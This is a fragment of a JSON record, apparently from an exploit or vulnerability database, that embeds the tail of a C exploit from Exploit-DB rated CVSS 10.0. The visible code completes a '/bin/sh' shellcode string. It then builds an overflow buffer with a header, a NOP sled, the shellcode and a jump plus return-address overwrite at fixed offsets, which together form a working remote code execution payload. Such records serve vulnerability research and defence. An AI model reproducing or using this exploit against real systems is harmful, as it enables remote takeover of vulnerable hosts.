2f\\x73\\x68\";\r\n\r\n\tunsigned char\thead[] =\r\n\t\t\"\\x07-7350-\\x00\\xfe\";\r\n\r\n\tmemcpy (buf, head, 9);\r\n\tfor (i = 9 ; i < (sizeof (buf) - strlen (shellcode)) ; ++i)\r\n\t\tbuf[i] = '\\x90';\r\n\tmemcpy (buf + sizeof (buf) - strlen (shellcode), shellcode,\r\n\t\tstrlen (shellcode));\r\n\r\n\tbuf[272] = '\\xeb';\r\n\tbuf[273] = '\\x08';\r\n\tbuf[274] = (OFFSET ) & 0xff;\r\n\tbuf[275] = (OFFSET >> 8) & 0xff;\r\n\tbuf[276] = (OFFSET >> 16) & 0xff;\r\n\tbuf[277] = (OFFSET >> 24) & 0xff;\r\n\r\n\tmemcpy (xp, buf, sizeof (buf));\r\n\r\n\treturn (sizeof 
(buf));;\r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/19918/"}]}